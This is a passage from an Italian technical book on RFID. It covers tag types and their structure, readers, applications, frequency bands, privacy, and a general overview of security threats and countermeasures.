Reader; non possiedono un vero e proprio trasmettitore, ma reirradia-no, modulandolo, il segnale trasmesso dal Reader e riflesso dalla pro-pria antenna. Le distanze a cui possono operare sono, al massimo, del-l’ordine di alcuni metri o di alcuni centimetri a seconda della frequen-za operativa.

- Attivialimentati da batterie. Incorporano ricevitore e trasmettitore come iReader. Possiedono memorie di dimensioni notevoli, spesso riscrivibi-li e possono contenere sensori. Le distanze a cui possono operaredipendono da trasmettitore e batterie, in genere sono, al massimo, del-l’ordine di 200 metri.

- Battery-Assisted Passive (BAP) TAGusano una fonte di energia per alimentare solo alcuni componenti deiTAG. Vengono anche classificati come:– Semi-passividotati di batteria utilizzata solo per alimentare il microchip o apparatiausiliari (sensori), ma non per alimentare un trasmettitore in quanto intrasmissione si comportano come TAG passivi. Le distanze a cui pos-sono operare sono, al massimo, dell’ordine di qualche decina di metri.

– Semi-attividefinizione di uso incerto e spesso confusa con quella di semi-passivi.

Figura I.2TAG passivo a bassa frequenza (HF)

Figura I.3TAG UHF “Square Squiggle” per piccoli

oggetti - dimensioni 23mm x 23mmAlien Technology

Figura I.5TAG UHF attivo i-Q8 S per usi industriali; possibile applicazione su carrello - Identec

Figura I.4TAG attivo per bassa frequenza(LF) 32K di memoria riscrivibile,

uso in presenza di metalliEMS - gruppo Datalogic (Italia)

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 45

Page 41: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva46

Propriamente dovrebbe indicare TAG dotati di batteria utilizzata peralimentare chip e trasmettitore.Per motivi di risparmio energetico, però, il TAG è normalmente dis-attivato. L’attivazione si ottiene tramite un ricevitore che opera con latecnologia dei TAG passivi. In assenza di interrogazioni il TAG puòquindi operare per tempi molto lunghi.

I TAG passivi sono tipicamente dei dispositivi a basso costo e di piccoledimensioni che consentono di realizzare numerosi tipi di applicazioni.Spesso ciascuna applicazione è legata a particolari caratteristiche dimensio-nali del TAG medesimo. Essendo infatti costituiti solamente da un’antenna(tipicamente stampata) e da un circuito integrato generalmente miniaturiz-zato, l’altezza dei TAG passivi può essere anche di poche centinaia dimicron. I TAG, quindi, possono essere inseriti in carte di credito, etichetteadesive, bottoni ed altri piccoli oggetti di plastica, fogli di carta, banconotee biglietti d’ingresso, generando così veri e propri oggetti “parlanti”.I TAG, inoltre, possono essere di tipo read-only o read-writable. Questi

ultimi consentono, durante il loro uso, oltre alla lettura, anche la modificao la riscrittura dell’informazione in essi memorizzata.In passato i TAG passivi erano principalmente di tipo read-only sia per-

ché la fase di scrittura richiede la disponibilità di una quantità elevata dienergia che si ricava con difficoltà dal segnale ricevuto, sia perché le memo-rie riscrivibili hanno un costo relativamente elevato. I TAG passivi riscrivi-bili sono comunque in rapida diffusione.I TAG passivi non possono iniziare la comunicazione ma possono sola-

mente essere interrogati.Per i TAG attivi o semi passivi, oltre alla maggior quantità di memoria ed

alla funzione di riscrivibilità della stessa, l’evoluzione tecnologica ha con-sentito di aggiungere, in alcuni casi, funzioni che superano di gran lunga lapura identificazione. Si ricordano, ad esempio, le funzioni di radiolocaliz-zazione (RTLS − Real Time Location System − identificazione della posi-zione dell’oggetto che contiene l’RFID) o la misura di parametri ambienta-li attraverso sensori (temperatura, movimento, ecc.). La differenza tra i duetipi non è tanto nelle funzioni di memoria o negli eventuali sensori, quanto

Figura I.6TAG semi passivo per uso in etichette,

l’applicazione è resa possibile per l’uso diuna batteria estremamente sottile e flessibileche consente al TAG di transitare attraverso

stampanti di etichette;il protocollo di comunicazione è compatibile

con i TAG passivi Gen2Power ID

Figura I.7TAG semi attivo con sensore di temperatura

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 46

Page 42: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE I - INTRODUZIONE AGLI RFID47

nel fatto che i TAG attivi sono dei veri e propri apparati ricetrasmittentimentre i TAG semi passivi sfruttano la tecnologia di trasmissione dei TAGpassivi e pertanto necessitano di risorse di alimentazione modeste.Conseguentemente i TAG semi passivi non possono iniziare la comuni-

cazione ma possono solamente essere interrogati mentre i TAG attivi sonoin grado anche di iniziare la comunicazione.Nei sistemi RFID i TAG sono, in genere, associati ad oggetti. Quando il

TAG passa attraverso il campo elettromagnetico (EM) generato da unReader, trasmette a quest’ultimo le proprie informazioni. Tipicamente unTAG passivo che riceve il segnale da un Reader usa l’energia del segnalemedesimo per alimentare i propri circuiti interni e, di conseguenza, “sve-gliare” le proprie funzioni. Una volta che il TAG ha decodificato come cor-retto il segnale del Reader, gli risponde riflettendo, mediante la sua anten-na, e modulando il campo emesso dal Reader.I protocolli di comunicazione tra Reader e TAG sono descritti in appo-

siti standard.Le informazioni che il TAG trasmette al Reader sono contenute in una

certa quantità di memoria che ogni TAG contiene al suo interno.Le informazioni d’identificazione sono relative all’oggetto interrogato:

tipicamente un numero di serie univoco, spesso una estensione dell’UPC(Universal Product Code) contenuto nel codice a barre ed altre informazio-ni (date di produzione, composizione dell’oggetto, ecc.). Normalmente laquantità di dati contenuti in un RFID è piuttosto modesta (centinaiadi byte o, al massimo qualche KByte). Ciò nonostante, la pervasivitàdell’uso dei TAG e di opportune tecniche a radiofrequenza che con-sentono di interrogare e ricevere risposte da tutti i TAG presenti inun particolare ambiente possono portare ad una “esplosione” dellaquantità di dati circolanti.

1.3.1 Struttura fisica dei TAG passivi

I TAG passivi sono sicuramente gli oggetti RFID più diffusi e la necessi-tà di mantenere i costi a livelli di pochi cent prevede grande attenzionealla loro struttura fisica.In un TAG passivo si possono distinguere, con riferimento alla Figura

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 47

Page 43: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva48

I.8, almeno tre componenti: il circuito (chip) l’antenna e il substrato.Il chip opera tutte le funzioni necessarie all’operatività del TAG, essen-

zialmente l’immagazzionamento dei dati (del TAG), la conversione dell’e-nergia RF ricevuta dall’antenna in alimentazione elettrica, le funzioni dimodulazione della riflessione dell’energia ricevuta necessaria per la tra-smissione dei dati.La memoria del chip può essere read-only (RO), write-once, read-many

(WORM), oppure read-write (RW). Vari tipi di memoria possono coesi-stere nello stesso chip. Tipicamente un chip RFID memorizza qualchecentinaio di bit (96 per il solo identificativo univoco). La capacità dimemoria, comunque, può variare da un numero minimo di bit (1÷2) cheindicano la semplice presenza del TAG (antitaccheggio) fino a qualchemigliaio di bit divisi in varie sezioni (RO, WORM, RW).Oltre all’alimentazione, alla memoria ed alla funzione di modulazione

della riflessione a RF, il chip può, nei casi più evoluti, possedere una logi-ca di controllo. Le sue capacità sono necessariamente limitate dalla scar-sità di alimentazione, ma sufficienti per qualche funzione di sicurezza eprotezione dell’informazione.

L’antenna è collegata elettricamente al chip. Le sue funzioni consisto-no nel raccogliere la maggior quantità possibile di energia RF irradiata dalReader (per consentire l’alimentazione del TAG) e nel rifletterne unaparte (per trasmettere).Le prestazioni di un TAG passivo (distanza operative, capacità della

logica di controllo) dipendono quindi fortemente dalla capacità dell’an-tenna di raccogliere energia e di rifletterla. Tutto ciò viene influenzatoessenzialmente dalle dimensioni dell’antenna medesima.La forma dell’antenna varia a seconde delle frequenze operative:

– per le frequenze basse vengono usate delle spire (come l’avvolgimentodi un trasformatore elettrico) avvolte in aria (per frequenze HF) oattorno ad una ferrite (per frequenze LF);

– per le frequenze UHF vengono usate antenne a dipolo di varia formae complessità (come nella maggior parte dei radioricevitori commer-ciali).

Figura I.8TAG passivo UHF “Butterfly” montato come

“etichetta intelligente” adesiva su cartaUPM Raflatac

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 48

Page 44: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE I - INTRODUZIONE AGLI RFID49

Il substrato fornisce il supporto fisico per l’assemblaggio del TAG ed il“collante” per tenerne insieme le componenti. Il substrato può essere rea-lizzato in Mylar, film plastico, carta o altri materiali. Nella tematica relati-va al substrato possono anche essere fatte rientrare le problematiche rela-tive al film di copertura e protezione del chip e dell’antenna, nonché quel-la dei contenitori per i TAG più robusti.

I READER

Il Reader (chiamato anche “interrogator” o “controller” se distinto dallasua antenna) è l’elemento che, nei sistemi RFID, consente di assumere leinformazioni contenute nel TAG.Si tratta di un vero e proprio ricetrasmettitore, governato da un sistema

di controllo e spesso connesso in rete con sistemi informatici di gestioneper poter ricavare informazioni dall’identificativo trasmesso dai TAG.Questo, infatti, specie nei TAG passivi, è un semplice codice che ha però(a differenza dei codici a barre) la particolarità di essere univoco. Entrandoquindi in un sistema informativo ed usando un codice univoco come chia-ve di ricerca, si possono ricavare dettagliate informazioni (anche aggiorna-te nel tempo) sul particolare oggetto a cui il TAG è associato.I Reader per TAG attivi sono dei ricetrasmettitori controllati, che pos-

sono usare le più diverse tecniche a radiofrequenza. I TAG attivi, ad oggi,sono solo in piccola parte coperti da standard specifici.

Figura I.9Vari modelli di ReaderSymbol Technologies;da sinistra a destra:

- RD5000 Mobile RFID Reader- XR440 Fixed RFID Reader industrial class, Gen2

- MC9090-G RFID Handheld Mobile Reader,Writer and bar code reader

I.1.4

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 49

Page 45: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva50

I Reader per TAG passivi (e semi passivi), invece, devono emetteresegnali RF di tipo particolare, in grado di fornire al TAG anche l’energianecessaria per la risposta. I metodi di modulazione e le caratteristiche diquesti segnali verranno discusse in dettaglio in §IV.2.Le tecniche di comunicazione e trasferimento dati utilizzate nei sistemi

RFID sono molto diverse tra loro per applicazioni che possono andaredalla lettura, a pochi centimetri di distanza, di TAG passivi, fino a preve-dere letture di TAG attivi a distanza di parecchie centinaia di metri.Esistono Reader fissi (montati sui portali di accesso ai magazzini, sui

nastri trasportatori, negli scaffali, ecc.) e Reader portatili (una sorta di“pistole elettroniche” esteticamente simili a quelle in uso per i codici abarre.Per quanto riguarda la diffusione, le installazioni di Reader fissi rappre-

sentano (compresi quelli per smart card), ad oggi, più dell’80% del tota-le a livello mondiale.Per quanto riguarda l’uso delle frequenze, la maggior parte del mer-

cato dei Reader, sia in termini di fatturato, sia in termini di numero diunità è rappresentato da Reader HF. Tuttavia si prevede che il mercatodei Reader UHF cresca molto più velocemente degli altri nel prossimofuturo.

LE APPLICAZIONI

In senso esteso la tecnologia RFID comprende un vasto insieme dimicro–apparati che sono utilizzati per identificare prodotti. I sistemi elet-tronici di raccolta pedaggi, le etichette impiantate negli animali per la loroidentificazione, il controllo degli accessi (biglietti e tessere) per i qualiviene sfruttata la lettura in prossimità ma senza contatto fisico o visivo, isistemi di bloccaggio centralizzato per autoveicoli, gli “ski pass”, sonotutte forme di sistemi RFID. TAG sono integrati nelle targhette degli abitio nelle calzature; un’azienda italiana ha brevettato anche un tappo perbottiglie di vino.Funzioni RFID sono integrate nei passaporti (in quello tedesco, a par-

tire da ottobre 2006, nel passaporto USA ed in altri), in alcune carte sani-

Figura I.11Esempio di Reader con antenne a “Portale”

per la lettura di oggetti in transitodc600 Gate UHF - Symbol Technologies

Figura I.10Vari modelli di antenne per Reader

Symbol Technologies

I.1.5

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 50

Page 46: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE I - INTRODUZIONE AGLI RFID51

tarie ed altri documenti e tra breve persino nelle banconote. Anche inItalia a partire dalla fine di ottobre 2006 sono rilasciati passaporti conintegrato un RFID conforme allo standard per Smart Card ISO 14443. Ildecreto del Ministero degli Affari Esteri del 29 novembre 2005 prevedeche nella memoria del TAG, di almeno 64Kb, siano memorizzate oltre alleinformazioni già presenti sul supporto cartaceo riguardanti il passaportoed il titolare nonché i codici informatici per la protezione ed inalterabili-tà, anche l'immagine fotografica del volto e le impronte digitali del ditoindice di ogni mano.Si comprende quindi che applicazioni basate su TAG passivi RFID

sono in rapido sviluppo e sfruttano da un lato le continue evoluzioni ditale tecnologia e dall’altro la consapevolezza, che progressivamente il mer-cato sta acquisendo, sui vantaggi apportati dalla sua introduzione in diver-si settori.

1.5.1 La catena di distribuzione

Una classe di applicazioni nella quale l’uso degli RFID sta diventandopervasivo è quella relativa alla catena di distribuzione delle merci (SupplyChain).A questo proposito il Parlamento Europeo ha varato, a partire dal

2005, una legislazione che rende obbligatoria la tracciabilità dei benilungo la catena di distribuzione. Questo favorirà lo sviluppo degli RFIDche si prestano molto meglio dei tradizionali codici a barre a veicolareinformazioni sugli oggetti ed a trasferirle ai sistemi che li interrogano.

Figura I.12Differenti livelli di identificazione

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 51

Page 47: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva52

Gli RFID vengono usati, nella catena di distribuzione, principalmentecome supporto dei codici identificatori universali di oggetti EPC(Electronic Product Code) (cfr. §IX.2). L’EPC e le informazioni contenu-te nei codici a barre (tipo di merce, produttore, ecc.), con identificativiunivoci per i singoli oggetti, nonché, in alcuni casi, con molti altri datisulle merci. La diffusione della tecnologia RFID, in un contesto di costiridotti per i TAG, renderà accessibile a tutti gli attori della catena di dis-tribuzione (fabbricanti, distributori, trasportatori, dettaglianti) una quan-tità di dati sui prodotti mai vista finora.

L’uso di etichette RFID per gestire container nella logistica di produ-zione e identificare pallet e cartoni nella logistica del commercio è giàdivenuto una realtà.Rimane ancora la gestione dei singoli oggetti (Item Management) su cui

sono state sviluppate numerose applicazioni (Item Level Tagging o ILT), manon si è ancora giunti ad una diffusione massiva.Sebbene si prevedano ancora degli anni prima che tutti gli articoli di con-

sumo nei supermercati siano muniti di etichette RFID, gli esempi sono giànumerosi ed i progressi nelle tecnologie e la relativa diminuzione del costodei TAG promettono di farne una tecnologia onnipresente e pervasiva.

Figura I.13RFID nella catena di distribuzione

Figura I.14Mini TAG HF UPM Raflatac

Copyright Metro Future Store

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 52

Page 48: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE I - INTRODUZIONE AGLI RFID53

LE FREQUENZE

Le frequenze di comunicazione tra Reader e TAG dipendono sia dallanatura del TAG, sia dalle applicazioni previste e sono regolate (per con-trollare le emissioni di potenza e prevenire interferenze) dai consuetiorganismi internazionali e nazionali. La regolamentazione, però, è divisain regioni geografiche con normazione diversa da regione a regione, checomporta spesso incompatibilità quando gli RFID viaggiano insieme allemerci alle quali sono associati.Le porzioni di bande di frequenze più comunemente usate nella tecnolo-gia RFID sono:• In banda LF (Low Frequencies) ed in particolare la sottobanda120÷145 kHz.Si trova nella parte più bassa dello spettro RF, è storicamente la primafrequenza utilizzata per l’identificazione automatica e, ancora oggi,continua ad avere una presenza significativa nel mercato.

• In banda HF (High Frequencies) ed in particolare la sottobanda cen-tratata su 13,56 MHz.È considerata la banda di frequenze “universale”, usabile in tutto ilmondo; questo ne ha fatto la banda più diffusa fino ad oggi.

• In banda UHF (Ultra High Frequencies), nella zona media, le sotto-bande 865 ÷ 870 MHz in Europa – 902÷928 MHz in USA – 950 MHzin Asia .È la “nuova banda” per gli RFID per la logistica e la gestione dei sin-goli oggetti, con distanze operative (cfr. § III.3.2.2) significativamentemaggiori di quanto non sia consentito da LF ed HF. Purtroppo labanda non è assegnata in modo uniforme nelle varie nazioni.

• In banda UHF, nella zona alta, la sottobanda centrata su 2,4 GHz.Con caratteristiche simili all’UHF, permette una ulteriore miniaturizza-zione del TAG. Si tratta, però, di una banda molto affollata da altre tec-nologie (WiFi, Bluetooth, ZigBee), con le quali è necessario convivere.Tuttavia, al di fuori dell’Europa, vengono usati, su questa banda siaTAG passivi che attivi, a standard ISO 18000-4.Esistono anche altre frequenze utilizzabili quali 433 ÷ 435 MHz in

banda UHF bassa o 5,8 GHz in banda SHF (Super High Frequencies).

I.1.6

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 53

Page 49: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva54

Ad oggi, alcune bande di frequenza (generalmente nelle LF o HF) sonoaccettate in tutto il pianeta. Un esempio per tutti è la banda dei 13,56MHz, usata da molti TAG passivi incorporati essenzialmente nelle smartcard per controllo accessi, identificazione e pagamenti, ma anche nelle eti-chette associate ad oggetti, quali controllo bagagli, lavanderie, bibliote-che, ecc.Per altre bande di frequenza, specie per quelle UHF di uso più recen-

te, le allocazioni sono differenti da regione a regione, anche se gli standardgarantiscono l’interoperabilità.La scelta della frequenza di lavoro influisce sulla distanza (range) di

operatività del sistema, sulle interferenze con altri sistemi radio, sulla velo-cità di trasferimento dei dati e sulle dimensioni dell’antenna.I sistemi che usano frequenze più basse sono spesso basati su TAG pas-

sivi e sono in grado di trasmettere dati a distanze massime dell’ordine delmetro e mezzo. Nei sistemi a frequenze più elevate, invece, oltre ai TAGpassivi (con limitazioni a pochi metri delle distanze operative) sono diffu-si TAG attivi che possiedono distanze operative maggiori.

Per sistemi a frequenza più alta, la velocità di trasferimento dati ègeneralmente maggiore mentre la dimensione delle antenne si riduce.Questo consente di costruire TAG più piccoli.

CICLO DI VITA DEI TAG E PRIVACY

La gran parte delle applicazioni che oggi si vanno costruendo per la cate-na di distribuzione delle merci mira all’associazione di RFID con ognitipo di contenitore (casse, pallet, container, ecc.), tuttavia, la diffusionemassiva degli RFID, con l’associazione di questi non più ai soli contenito-ri ma ai singoli (e più vari) oggetti, modificherà i costumi della nostrasocietà in modo molto più profondo di quanto la rivoluzione, nella cate-na di distribuzione, possa far pensare.Il ciclo di vita dei TAG supera spesso, e di gran lunga, quello degli

oggetti ai quali sono associati. Specie i TAG passivi, non necessitando dibatterie, hanno aspettativa di vita teoricamente infinita.I TAG continuano quindi a funzionare anche quando la catena di dis-

I.1.7

Figura I.15TAG HF

LAB ID (Italia)

Figura I.16Esempi di TAG UHF Gen2

a) Con antenna in alluminio 97x15 mmottimizzata per 868MHz − UPM Raflatac

b) RFX6000 Inlay – Symbol Technologies

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 54

Page 50: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE I - INTRODUZIONE AGLI RFID55

tribuzione è giunta al termine. Ciò significa che, a meno dell’eliminazionedel TAG o di altre di prescrizioni a tutela della privacy, è possibile inter-rogare gli oggetti in possesso di proprietari privati e continuare ad inter-rogarli anche quando, cessata la loro funzione, gli oggetti venissero rotta-mati.Con un po’ di vena fantascientifica, si potrebbe ipotizzare che futuri

archeologi, frugando tra discariche e ruderi della nostra civiltà, si farannoraccontare da questi piccoli circuiti la storia dei commerci e delle abitudi-ni di vita dei nostri popoli.In realtà, in modo più pragmatico, il dibattito su RFID e privacy tende

a focalizzarsi principalmente sulle applicazioni di TAG a singoli articoli diconsumo e ad oggetti abitualmente in possesso di privati (carte di paga-mento o di accesso, apparati elettronici, ticket, ecc). In particolare, anchese l’etichettatura elettronica di singoli articoli non è ancora massivamentediffusa, la potenziale minaccia connessa con questa tecnologia agita timo-ri connessi al fatto che aziende o organizzazioni di vario genere possanoacquisire informazioni indebite sulla clientela.Di recente è salito agli onori delle cronache il caso di una vertenza sin-

dacale che ipotizzava l’uso indebito delle tessere RFID di riconoscimentoed accesso in possesso del personale di un’azienda, per il tracciamentodegli spostamenti all’interno dell’azienda medesima. Viene spesso adom-brato anche l’uso congiunto di carte di credito o loyalty cards ed RFIDsugli oggetti acquistati per creare basi di dati che consentano di risalire daun oggetto al suo acquirente.La soluzione che si sta mettendo in atto nell’UE, per la gestione degli

oggetti (cfr. §VIII.4.2.1), è la possibilità di disattivare permanentemente iTAG al termine della catena di distribuzione (cfr. §VIII.5.4), ovveroquando gli oggetti siano entrati in possesso dell’utente finale.In attesa che la tecnologia compia il suo percorso, in Italia il Garante

per la Protezione dei Dati Personali ha emesso un provvedimento a carat-tere generale − Garanzie per l’uso di “Etichette intelligenti” (Rfid) − 9marzo 2005 [41]. Il provvedimento definisce misure al fine di rendere iltrattamento dei dati personali nell'ambito dei sistemi RFID conforme alledisposizioni vigenti, anche in relazione al principio di dignità della perso-

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 55

Page 51: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva56

na (art. 1 Carta dei diritti fondamentali dell'Unione Europea; artt. 2 e 154,comma 1, lett. c), del Codice in materia di protezione dei dati personali.

SICUREZZA

Lo sviluppo della tecnologia dell’informazione (di cui gli RFID sono parte)porta ad un aumento smisurato delle disponibilità di dati su qualsiasi cosaesista al mondo (incluse naturalmente le persone). La conseguenza inevita-bile sono tentativi illeciti per impadronirsi delle informazioni e farne usialtrettanto illeciti. Di questa situazione va preso atto con serenità e con fer-mezza, provvedendo ad attuare le opportune contromisure.In particolare, la diffusione dei sistemi RFID per l'identificazione elet-

tronica, porta ad un fiorire di tecniche fraudolente per acquisire informa-zioni indebite o diffondere informazioni false.Spesso la possibilità di attacchi alla sicurezza ed alla privacy costituisce

l’aspetto duale dei benefici delle nuove tecnologie; in altri termini “l’effet-to collaterale” di quest’ultime.Un esempio possono essere i TAG sulle banconote, potente aiuto anti-

contraffazione e per il tracciamento di “denaro sporco”, ma pericoloso vei-colo di aggressioni per la facilità di conoscere “quanto denaro hai in tasca”.La lettura “non-line-of-sight”, caposaldo della tecnologia RFID, è la

prima fonte dei vantaggi, ma anche dei timori sulla sicurezza. In altri ter-mini, l’acquisizione fraudolenta di dati o la loro alterazione o distruzioneviene facilitata e non contrastata dall’uso di tecnologie che non richiedo-no né il contatto fisico, né la visibilità degli apparati.Inoltre l’incremento di informazioni rispetto all’etichettatura conven-

zionale è auspicato come un vantaggio commerciale, ma è anche temutoperché la disponibilità di molte informazioni favorisce concorrenti emalintenzionati.C'è poi da ricordare che, trattandosi di una tecnologia radio, vanno

considerate tutte le classiche problematiche di intercettazione e interru-zione del servizio tipiche dei sistemi a radiofrequenza.Quanto un RFID è più sicuro di un’etichetta cartacea o di un docu-

mento tradizionale? Per capirlo conviene tracciare un quadro con alcuniaspetti della tecnologia:

I.1.8

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 56

Page 52: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE I - INTRODUZIONE AGLI RFID57

- L’identificazione di un tipo di oggetto diventa quella di uno specificooggetto che acquista una propria identità.

- L’identità di un oggetto può essere la chiave di accesso a sistemi infor-mativi, ciò implicando la deducibilità di molti dati tra cui quelli sull’ac-quirente.

- La scrittura di dati sul TAG è, a volte, agevole e non lascia tracce diquanto avvenuto.

- Le azioni fraudolente divengono immateriali, si passa da falsari adaggressori informatici e questo cambia il modo di provare la frode.

Da questo quadro si possono evincere possibili scenari di attacco:- L’inventario è realizzabile anche da competitor.- La modifica delle informazioni contenute in un TAG o l’utilizzo di sistemiper “nasconderlo”, rendono possibile l’inganno dei sistemi di pagamento.

- La distruzione o riprogrammazione di TAG in un punto vendita pro-voca caos operativo (si pensi alle date di scadenza!).

- Diviene possibile la profilazione dei consumatori sulla base delle lorocarte elettroniche e delle etichette sui prodotti che possiedono.Quest’ultimo punto, la temuta violazione della privacy, può generare

applicazioni “innocue” (diffusione locale di pubblicità mirata / indirizza-mento automatico del cliente), oppure “maliziose” (“in che negozio haicomprato finora?”) o, in alcuni casi, decisamente inaccettabili (“interes-sante che tu abbia questa rivista/libro/DVD nella borsa!”; “quell’indivi-duo è di nazionalità xxx! / ha malattie pericolose !”.Situazioni a rischio sono anche obiettivamente favorite dal fatto che si

tende a considerare le tecnologie “sicure” solo perché sono “nuove”anche quando effettivamente sicure non sono.Nell’etichettatura tradizionale è d’uso non acquisire in modo acritico il

contenuto di un’etichetta cartacea (o un codice a barre). Se alla letturadell’etichetta di una giacca si rileva la dicitura maglione, si interviene perovviare all’errore. Le etichette elettroniche, invece, sono nate per una let-tura automatica: se un detersivo, interrogato, dichiara di essere un for-maggino, spesso il dato viene acquisito.In generale, i sistemi di inventario considerano effettivamente presenti

le merci in un contenitore o su uno scaffale sulla base dei TAG anziché

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 57

Page 53: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva58

delle confezioni effettivamente presenti, oppure assumono come veritierele notizie sulle merci (contenuti, scadenza, ecc.) fornite direttamente dalTAG, senza considerare che falsificare un dato elettronico, in assenza diefficaci meccanismi di sicurezza ed auditing, è di gran lunga più semplicee difficilmente rintracciabile che contraffare un documento cartaceo.L’alterazione di etichette cartacee, è operazione non semplice e non

immediata, mentre un aggressore esperto potrebbe, ad esempio, alterarein pochi minuti migliaia di date di scadenza di alimenti scritte nelle eti-chette elettroniche in un supermercato.Per affrontare le problematiche di sicurezza è necessario partire da

modelli delle tipologie di attacco (threat) ai sistemi RFID. La classificazio-ne dei threat, base per l’individuazione dei modelli, è sintetizzata nellaTabella I.1 ed è descritta in dettaglio nella parte VIII di questo volumededicata alla sicurezza nei sistemi RFID.Gli attacchi vengono anche distinti in due categorie, sulla base dei sog-

getti attaccati:

Tabella I.1Modelli di threat

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 58

Page 54: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE I - INTRODUZIONE AGLI RFID59

- attacchi alla Privacy dei consumatori;- attacchi alla sicurezza della catena di distribuzione.La distinzione non deriva dai particolari threat impiegati, bensì dall’im-

patto sociale dell’attacco. In un caso vengono attaccati singoli cittadini,l’altro caso rientra nella tematica dello spionaggio industriale, al contrastodel quale tutte aziende dedicano risorse.Per concludere, come di norma in questioni di sicurezza, vale l’assioma

che la difesa deve essere proporzionata all’attacco. La conseguentedomanda su quanto è necessario che un RFID sia “sicuro”, implica rispo-ste articolate:- Per tutelare la Privacy un provvedimento immediato e risolutivo è l’i-nibizione della lettura dei TAG dopo la vendita dei beni che li suppor-tano, rendendoli inoffensivi al di fuori del contesto per i quali sono statisviluppati. In alternativa, per alcuni beni di consumo, soluzioni basatesull’inibizione parziale delle informazioni (rimarrebbero composizionee date di scadenza) oppure sulla riduzione della distanza di letturadovrebbero essere sufficienti. Ciò offrirebbe al consumatore i vantaggidi non rinunciare a merci comunque “gestibili” da elettrodomestici“intelligenti” (lavatrici, frigoriferi, ecc.). Esistono soluzioni tecnologi-che che prevedono la disabilitazione totale (Killing) o parziale(Clipping) dei TAG (cfr. §VIII.3.2) e che sono attuabili o verificabilidirettamente dall’utente.

- Per la sicurezza della catena di distribuzione, invece è essenziale assicu-rare la non alterabilità delle informazioni e l’impossibilità di clonazionidei TAG. Questo richiede tecnologie di cifratura dei dati. Le misureattuabili, specie per TAG passivi a perdere ed a basso costo (applicazio-ni “open loop”), consistono principalmente nella protezione dellamemoria tramite password come nel caso dei TAG Gen2 (cfr.§VIII.5.4). Altri efficaci provvedimenti per la sicurezza consistono nell’u-so di funzioni hash per la cifratura dei dati nelle memorie dei TAG, conapposizione di firma digitale, nota anche come autenticazione passiva.Nella gestione di chiavi di cifratura e password, però, va considerato

che mentre le merci transitano lungo la catena di distribuzione, passandodi mano in mano, i singoli attori della catena perdono rapidamente inte-

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 59

Page 55: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva60

resse alla sicurezza di una partita di merce una volta che se ne siano libe-rati passandola all’attore successivo. Precauzione essenziale è pertanto lacontestualizzazione delle password e delle chiavi di cifratura nei segmen-ti della catena di distribuzione.Per fronteggiare le problematiche legate alla sicurezza esistono anche

soluzioni efficienti, normalmente basate sull’interfacciamento dei TAGcon metodi crittografici. In tale ambito ricadono sia le procedure diautenticazione “forte” (cfr. § VIII.5.2) sia le tecniche per l’allestimento diun canale sicuro basate sull’utilizzo di algoritmi crittografici robusti (cfr.§ VIII.5.3). Questi metodi richiedono però sia una capacità elaborativadifficilmente compatibile con TAG passivi a basso costo, sia la disponibi-lità di “molta” energia per alimentare il chip del TAG, il che riduce dimolto la distanza di lettura nei sistemi passivi .Per concludere, se da un lato è indispensabile un serio lavoro proget-

tuale sulle misure di sicurezza nelle applicazioni RFID, dall’altro le “eti-chette intelligenti” applicate agli oggetti, andranno saggiamente conside-rate come tali e non come documenti certificati.

STANDARD DEI TAGPer il successo di un’applicazione, TAG e Reader devono comunicare traloro facilmente e senza disturbare altri servizi a radiofrequenza.Pertanto, come sempre accade in applicazioni che richiedono interope-

rabilità tra entità diverse, un aspetto tecnologico essenziale sono gli stan-dard di comunicazione. I due principali obiettivi che gli standard devonoassicurare sono:• Interoperabilità tra Reader e TAG di differenti fabbricanti.• Non interferenza delle operazioni con altri apparati radio elettrici. Ilrispetto del principio di non interferenza, riguarda la natura fisica dellacomunicazione radio, ovvero, dal punto di vista della normativa:• Bande di frequenze radio sulle quali si opera.• Larghezze di banda (all’interno delle bande permesse per il servizio).• Potenze radio di emissione e condizioni ambientali in cui le emissio-ni avvengono (indoor, outdoor).

I.2

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 60

Page 56: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE I - INTRODUZIONE AGLI RFID61

•Emissione di segnali spuri (per qualsiasi causa).Il dialogo tra TAG e Reader, per parte sua, richiede la normazione di

